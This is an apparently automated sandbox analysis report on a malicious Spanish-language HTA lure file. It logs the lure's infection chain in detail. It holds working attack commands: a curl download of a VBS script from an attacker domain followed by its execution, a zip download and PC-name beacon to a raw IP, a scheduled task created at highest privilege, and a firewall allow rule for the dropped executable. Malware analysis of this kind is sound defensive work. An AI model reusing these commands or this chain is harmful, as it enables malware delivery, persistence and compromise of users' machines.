Windows Analysis Report
#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta

Compliance

Source: unknown	HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49714 version: TLS 1.2

Networking

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 109.234.39.156 80

Source: C:\Windows\SysWOW64\curl.exe	Dropped file: adodbStream.Write xmlhttp.ResponseBody			Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	Dropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2			Jump to dropped file

Source: global traffic	HTTP traffic detected: GET /mod-mx282/mx2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mx/mx2810.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: unknown	TCP traffic detected without corresponding DNS query: 109.234.39.156

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 10:57:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 25 Oct 2024 12:51:08 GMTETag: "2600dc2-6254c92a08700"Accept-Ranges: bytesContent-Length: 39849410Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 14 00 00 00 08 00 1c 4e 59 59 c9 28 78 92 a7 5e 06 02 00 80 90 04 08 00 00 00 37 7a 78 61 2e 64 6c 6c cc 3b 6b 6c 5b e7 75 87 97 14 5f a2 64 52 92 13 d7 b1 67 c5 96 5d d9 92 95 d8 92 3d 25 51 5d d2 a2 64 2b d1 83 b6 a8 c7 5a 03 36 2d 5e 49 9c 28 92 bb bc b4 e5 21 5d 3c 34 05 d2 c2 d8 8c c6 09 d2 56 49 bc 4c 49 83 24 1d bc 4d 43 85 2d 18 fc 23 0b 8c 40 45 3d cc 03 f2 c3 40 bd 41 18 e2 20 18 bc d6 6b dc ce 19 77 ce f7 7d f7 45 52 0f 5a 29 b0 0b 48 e7 de f3 9d f7 f7 fe ce c7 be 6f 44 40 02 00 07 6c 80 7c 1e 60 01 f8 13 84 cd b0 ea 63 03 f8 7b 3f 54 6f 9b f7 fc ec d1 05 5b ef cf 1e bd 78 31 3a 99 c8 d6 67 94 f4 84 12 9b ae 9f ce 65 d5 fa d3 72 bd 92 4b d5 e7 52 71 59 a9 1f 49 a4 5a f7 57 79 1b 7e 1f fe 9f 3c 91 2e 80 5e 9b 17 16 5e 7c 64 42 c3 dd 02 e9 d1 4a 9b f4 15 f8 de 5b 76 f8 e5 6d 86 bb 33 87 ef 7e 7c b9 f2 96 9d a2 c3 de 31 70 4e 56 6a 40 b8 f2 aa 03 83 c9 1e 09 82 36 43 93 9f f3 80 00 97 17 ec 8b 54 7a eb a7 f6 b9 d7 11 9e ff 17 3b ec f9 08 8a 9e ab 0b f6 1b 7f bb 19 ca 7d 36 dd fb a9 dd ff 10 c9 5d b0 ff b0 a6 b8 bc 45 95 67 54 84 1f ff fb 9b dc af 25 84 0e 2b 4d 3d c0 a9 96 04 27 dc f2 26 61 d0 f7 b7 10 7c f2 a6 bd 88 2e 1e 53 63 f8 fe c2 37 1d 3c 46 27 10 fe d9 5b 16 3a 8c da d5 96 d3 d9 2c bd 2f 5d f5 61 20 de b5 43 e9 e7 6a 4b 82 0b 9c 7b 9d c7 08 2e 23 fc f4 9d 62 79 71 4e f8 c3 1a ee 2b d4 21 fc de bb c5 74 32 97 b7 68 e3 b1 67 8d fe b5 22 ba 60 8b c2 e9 ba 08 71 45 d0 5d 2e 45 27 27 d3 63 00 ac 6e b0 8e 60 1e e1 1b 45 74 87 5b 94 ac 32 46 1f 7b 3e 32 ea 78 f8 c3 22 79 ec c5 dc 86 e8 39 7f d1 b1 22 dd 97 f0 38 fc 41 b0 bb 0e a7 d3 49 39 96 62 ad 95 fd 43 6c 45 77 2c 99 95 1d 51 25 27 3b 07 cf 65 55 79 9a 42 d1 86 25 92 3b 94 ca 26 3a 27 63 0a a3 cd b3 a6 4e 7d 09 cb 3c 0e c2 33 f7 f2 79 81 9f 44 bc cd 3d 38 99 56 d4 9e 94 0a e7 f3 f9 fc 73 1a cf f3 bc 6c 3a 96 4c 62 99 a4 15 b2 b2 cb 54 e6 42 b4 3c 21 2b 14 09 56 28 c1 02 e1 1d 87 cf a9 b2 55 ff 75 86 1f 49 2b 71 ab fe 4f 98 8e ce 98 12 4f a4 62 c9 0a 5e 96 cf b3 32 47 20 08 75 ae 48 3a 81 5a 14 e0 92 36 21 ce 5f 81 7a 0f b6 11 46 28 ce 73 e5 f8 b4 53 b9 73 c8 4c 00 54 aa 09 1d c5 72 9b a7 3f a6 26 ce c8 48 64 b2 1c 40 a5 32 2f 2f 23 09 66 6b 2e 62 99 c3 39 98 48 4d 24 65 b2 e3 32 7d bb bb 66 54 19 c7 ce b8 c4 74 cf 33 9a 70 3a 77 3a 29 db 10 f3 01 7d 3b 3a d3 d3 19 3b 2b bf c1 78 3a 73 8a 22 a7 c6 ce 39 b8 ff 88 ab a8 64 f1 1f 54 15 14 8f ca ee 93 df 9e 88 56 91 8f 53 b5 12 6d 5d 0d c3 8f 24 e2 32 e1 7b 35 7c 33 e2 ed 6e 8a 39 b5 15 2d 26 cf 35 d6 2c d3 50 4e 30 7a aa 0b a2 97 34 fa d1 e5 e8 2f 30 fa de 74 6a 82 e8 f5 90 bd b0 1c fd fb 58 50 e3 cc 32 77 48 fa 22 7e 57 7a c9 ec 41 1d 77 0b 71 5e 2f b9 c8 71 54 b9 77 11 e7 73 0d c7 94 44 8c 9a 1b 38 6a f1 db 3b 90 94 0d 1

Source: global traffic	HTTP traffic detected: GET /mod-mx282/mx2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mx/mx2810.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: acess.mailcffemx.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49714 version: TLS 1.2

System Summary

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: classification engine

Classification label: mal96.evad.winHTA@51/13@1/27

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\6720bdf227263[1].js

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1308$432c4c
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$17d0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6096
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe

File created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept

Source: Yara match

File source: 0000001D.00000000.1560866719.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll
